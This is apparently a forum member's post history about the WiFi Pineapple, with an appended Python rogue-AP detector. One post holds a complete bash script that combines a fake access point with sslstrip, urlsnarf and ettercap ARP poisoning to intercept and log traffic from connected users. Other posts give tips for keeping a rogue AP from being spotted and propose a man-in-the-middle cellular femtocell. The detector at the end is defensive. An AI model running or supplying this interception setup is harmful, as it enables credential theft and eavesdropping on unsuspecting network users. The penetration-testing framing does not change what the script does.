dwek

Active Members
  • Posts

    11
  • Joined

  • Last visited


  1. Hi, I’m considering what I can do to increase the efficiency of new engagement recon by performing a more complete wireless survey within the initial engagement contact. Has anyone considered automating the use of an Ubertooth, Yardstick, HackRF and 4G LTE Femto cell to survey a site, to work out if you need to consider Bluetooth, Wifi, commercial or Cell assessments? Or has this already been done? Combining this with general IPv4/6 internal/external assessments, IPv6 RA/IPv4 ARP spoofing and app vuln scans, should give a reasonable start point, followed by standard policy, procedure, internal/external threat/exposure analysis. Any ideas if anyone has automated this or am I back to combing a range of Git scripts? I’ve also considered including an additional HackRF with a down converter to survey the use of sat phone and other SHF comms.
  2. Regrettably I suspect this is the case here. The PSU I used was for an Arduino board, but the intended board appears to have some regulation. I confirmed the output voltage of the other supply on a 10 MΩ probe and it is about 17.3 V, although on a DC digital multimeter it is 12.5 V. I wonder if there is a CCT diagram available to see if I can replace any of the components to resurrect the device.
  3. I suspect you're right with the Mark V, it used to be possible with the old Pineapple. I used the USB many times from a USB battery and directly from a PC USB port. I can imagine the current requirement and possibly the 9V DC source is more important with the Mark V.
  4. Yeah I have read many posts that say it can handle 12V, but the other PSU is definitely a 12V DC with the right polarization according to the label. I'll check the other PSU with a multimeter and oscilloscope, but the supply is new and used with another Arduino board.
  5. Hi all, I accidentally connected a 12 V DC supply to my Pineapple and it started to smell funky - it smelt like it overheated. Now when I connect the correct power supply, the lights do not turn on. When I connect a USB external charger to the USB on the Pineapple, all the lights flash. As I said... A sad day! Is there anything I can do to replace parts on the PCB to recover the device or purchase a new board? Other than purchasing a new device at the full price, are there any other options? It's one of my favorite multi-function devices. Thanks in advance.
  6. I'm now thinking that it may just be easier to write something that uses urlsnarf, sslstrip and ettercap on the Pineapple. As the Pineapple is a fake AP, I won't need to use any ARP poisoning. Anyone know of anything around? I'm assuming this will also need some port forwarding on for sslstrip to work properly.
  7. Hi, I'm working on a script to leverage the standard WP4.sh script for the Pineapple IV, combined with a MITM SSLstrip script. The below is sort of working, but I have issues with the first iptables statement forwarding properly and how URLsnarf & SSLstrip are being passed traffic. I'm also thinking that excluding ARP poisoning the Pineapple might be a good idea. Any thoughts? It's probably something obvious or just my lack of looking. Either way, I thought I would share what I have got so far. Thanks

     #!/bin/bash
     #This script combines the Wireless Pinapple (wp4.sh) and the MITM script v1.0 beta found at
     #http://360percents.com/posts/automatic-mitm-shell-script/

     #define variables
     echo -n "Input Pineapple Netmask [or ENTER for 255.255.255.0]: "
     read pineapplenetmask
     if [[ $pineapplenetmask == '' ]]; then
         pineapplenetmask=255.255.255.0 #Default netmask for /24 network
     fi

     echo -n "Input Pineapple Network [or ENTER for 172.16.42.0/24]: "
     read pineapplenet
     if [[ $pineapplenet == '' ]]; then
         pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24
         pineapplerange=172.16.42.2-254 # Pineapple network. Default is 172.16.42.2-254 excluding the Pinapple IP
     fi
     if [[ $pineapplenet != '172.16.42.0/24' ]]; then
         pineapplerange=$pineapplenet # If default 172.16.42.0/24 is not selected, provide reduced target scope to ettercap
     fi

     echo -n "Input Interface between PC and Pineapple [or ENTER for eth0]: "
     read pineapplelan
     if [[ $pineapplelan == '' ]]; then
         pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple
     fi

     echo -n "Input Interface between PC and Internet [or ENTER for wlan0]: "
     read pineapplewan
     if [[ $pineapplewan == '' ]]; then
         pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan
     fi

     temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default
     echo -n "Input Internet Gateway [or ENTER for $temppineapplegw]: "
     read pineapplegw
     if [[ $pineapplegw == '' ]]; then
         pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default
     fi

     echo -n "Input IP Address of Host PC [or ENTER for 172.16.42.42]: "
     read pineapplehostip
     if [[ $pineapplehostip == '' ]]; then
         pineapplehostip=172.16.42.42 #IP Address of host computer
     fi

     echo -n "Input IP Address of Pineapple [or ENTER for 172.16.42.1]: "
     read pineappleip
     if [[ $pineappleip == '' ]]; then
         pineappleip=172.16.42.1 #Thanks Douglas Adams
     fi

     #Display settings
     echo Pineapple connected to: $pineapplelan
     echo Internet connection from: $pineapplewan
     echo Internet connection gateway: $pineapplegw
     echo Host Computer IP: $pineapplehostip
     echo Pineapple IP: $pineappleip
     echo Network: $pineapplenet
     echo Netmask: $pineapplenetmask

     #Bring up Ethernet Interface directly connected to Pineapple
     ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up

     # Enable IP Forwarding
     echo '1' > /proc/sys/net/ipv4/ip_forward
     echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
     cat /proc/sys/net/ipv4/ip_forward

     #clear chains and rules
     iptables -X
     iptables -F
     echo iptables chains and rules cleared

     #setup IP forwarding
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 -j ACCEPT
     iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT
     iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
     iptables -A POSTROUTING -t nat -j MASQUERADE
     echo IP Forwarding Enabled

     #remove default route
     route del default
     echo Default route removed

     #add default gateway
     route add default gw $pineapplegw $pineapplewan
     echo Pineapple Default Gateway Configured

     #create directory to store session results
     echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): "
     read -e SESSION
     mkdir /root/$SESSION/

     # Sslstrip
     echo "[+] Starting sslstrip"
     xterm -geometry 75x15+1+200 -T sslstrip -e /pentest/web/sslstrip/sslstrip.py -f -s -k -w /root/$SESSION/$SESSION.log &
     sleep 2

     # urlsnarf
     echo "[+] Starting urlsnarf"
     urlsnarf -i $pineapplelan | grep http > /root/$SESSION/$SESSION.txt &
     sleep 1

     # Ettercap
     echo ""
     echo "[+] Starting ettercap"
     xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $pineapplelan -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp:remote /"$pineappleip"/ /"$pineapplerange"/ &
     cat /proc/sys/net/ipv4/ip_forward
     iptables -t nat -L
     sleep 1

     #instructions
     #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
     ping -c3 $pineappleip
     if [ $? -eq 0 ]; then
         echo ""
         echo "ICS configuration successful."
         #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
         #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
         #echo "Enter Pineapple password if prompted"
         #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
     fi

     echo ""
     echo "Browse to http://$pineappleip/pineapple -- Happy Hacking!"
     echo ""
     echo ""
     echo "[+] IMPORTANT"
     echo -n "After you have finished please close this script and clean up properly by hitting y "
     echo ""
     echo ""
     read WISH
     echo ""

     # Clean up sslstrip, ettercap and urlsnarf
     if [ $WISH = "y" ]; then
         echo ""
         echo "[+] Cleaning up and resetting iptables..."
         killall sslstrip
         killall ettercap
         killall urlsnarf
         killall xterm
         echo "0" > /proc/sys/net/ipv4/ip_forward
         iptables --flush
         iptables --table nat --flush
         iptables --delete-chain
         iptables --table nat --delete-chain
         etterlog -p -i /root/$SESSION/$SESSION.eci
         echo "[+] Clean up successful...Bye!"
         exit
     fi
     exit
  8. Worth a look at this $49 Android device if you are after a cheap environment. http://apc.io/about/ http://www.pcmag.com/article2/0,2817,2404770,00.asp.
  9. Something like this. wiki.thc.org/vodafone
  10. A couple of thoughts. A good start is to change the MAC address so it doesn't give away the default hardware MAC vendor mapping performed by basic scanners. Restrict the aliased SSIDs. Don't use the standard Nyan Cat redirects. It's a dead giveaway. Plan your deployment and predict your outcomes upfront, to optimise your setup and the results. Make sure the back channel works well, so as to reduce the chance of any suspicion. I'm playing with different user agents and techniques to see how the Pineapple reacts to differing scanning techniques. This is just for my interest... I think the WiFi Pineapple is great.
  11. Hi, Similar to the functionality and deployment methods of the WiFi Pineapple, has anyone considered looking at making a 3G/4G Femtocell? The price of the hardware is getting a lot cheaper and it seems to be a natural evolution of the idea. I.e. Accept all cellular Data, SMS and maybe voice connections. Connect all Internet, SMS and voice calls to free/paid SIP and/or Mobile SIM and/or free WiFi gateway. I assume there are issues to consider with respect to the auth process undertaken by the handset when connecting to a MITM cell, but I assume this can be overcome by using the roaming functionality, which is often used between carriers to provide regional/international flexibility & carrier redundancy. If the Femtocell supported all the global frequencies, this would also provide the ability to review international visitors. Anyway, it was just an idea.
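Post 10 above lists the two things basic scanners key on when looking for a rogue access point: the vendor prefix (OUI) of the hardware MAC, and one radio answering to many aliased SSIDs. The following is an added example, written from the detecting side and not code from the poster or from Hak5; it takes scan records in a constructed `bssid,ssid,channel,rssi` line format and flags BSSIDs that exhibit either sign. The watch-list OUI, the alias threshold and the sample scan lines are constructed placeholders, not real vendor assignments.

```python
"""Rogue-AP triage over Wi-Fi scan records (added example, constructed data).

Two indicators drawn from the thread above:
  * one BSSID advertising many distinct SSIDs (SSID aliasing), which
    survives a MAC change because it is behaviour, not an identifier;
  * a BSSID whose OUI sits on a watch list, which a MAC change defeats and
    is therefore only a weak, corroborating signal.
"""
from collections import defaultdict

# Constructed watch list: OUI -> label. A real deployment would load the
# IEEE OUI registry; this prefix is a placeholder, not a real assignment.
WATCHED_OUIS = {"00:11:22": "audit-hardware OUI (placeholder)"}

# A single BSSID beaconing this many or more SSIDs is treated as aliasing.
SSID_ALIAS_THRESHOLD = 3


def parse_scan(lines):
    """Parse 'bssid,ssid,channel,rssi' lines into dicts; malformed lines are skipped."""
    records = []
    for line in lines:
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 4:
            continue
        bssid, ssid, channel, rssi = parts
        try:
            records.append({
                "bssid": bssid.lower(),
                "ssid": ssid,
                "channel": int(channel),
                "rssi": int(rssi),
            })
        except ValueError:
            continue  # non-numeric channel/rssi: drop the record
    return records


def oui(bssid):
    """First three octets of a colon-separated MAC, lower-cased."""
    return bssid.lower()[:8]


def find_suspicious(records):
    """Return one finding per BSSID that trips at least one indicator."""
    ssids_per_bssid = defaultdict(set)
    for rec in records:
        ssids_per_bssid[rec["bssid"]].add(rec["ssid"])

    findings = []
    for bssid, ssids in ssids_per_bssid.items():
        reasons = []
        if len(ssids) >= SSID_ALIAS_THRESHOLD:
            reasons.append(f"advertises {len(ssids)} distinct SSIDs")
        if oui(bssid) in WATCHED_OUIS:
            reasons.append(f"OUI on watch list: {WATCHED_OUIS[oui(bssid)]}")
        if reasons:
            findings.append({
                "bssid": bssid,
                "ssids": sorted(ssids),
                "reasons": reasons,
            })
    return sorted(findings, key=lambda f: f["bssid"])


# Constructed sample scan: two legitimate corporate BSSIDs, one radio that
# answers to three SSIDs from a watch-listed OUI, a malformed line, a guest AP.
SAMPLE_SCAN = [
    "AA:BB:CC:00:00:01,CorpWiFi,6,-50",
    "AA:BB:CC:00:00:02,CorpWiFi,11,-60",
    "00:11:22:33:44:55,Free Airport WiFi,1,-40",
    "00:11:22:33:44:55,CorpWiFi,1,-41",
    "00:11:22:33:44:55,Coffee Shop,1,-42",
    "this line is malformed",
    "DE:AD:BE:EF:00:01,Guest,36,-70",
]

if __name__ == "__main__":
    for finding in find_suspicious(parse_scan(SAMPLE_SCAN)):
        print(finding["bssid"], "->", "; ".join(finding["reasons"]))
        print("   SSIDs:", ", ".join(finding["ssids"]))
```

The aliasing check is the one worth keeping: it flags the radio even after its MAC has been changed, whereas the OUI check only ever confirms an unmodified device. Multi-SSID enterprise controllers will also trip the threshold, so in practice the SSID set is compared against the site's known SSID inventory before raising an alert.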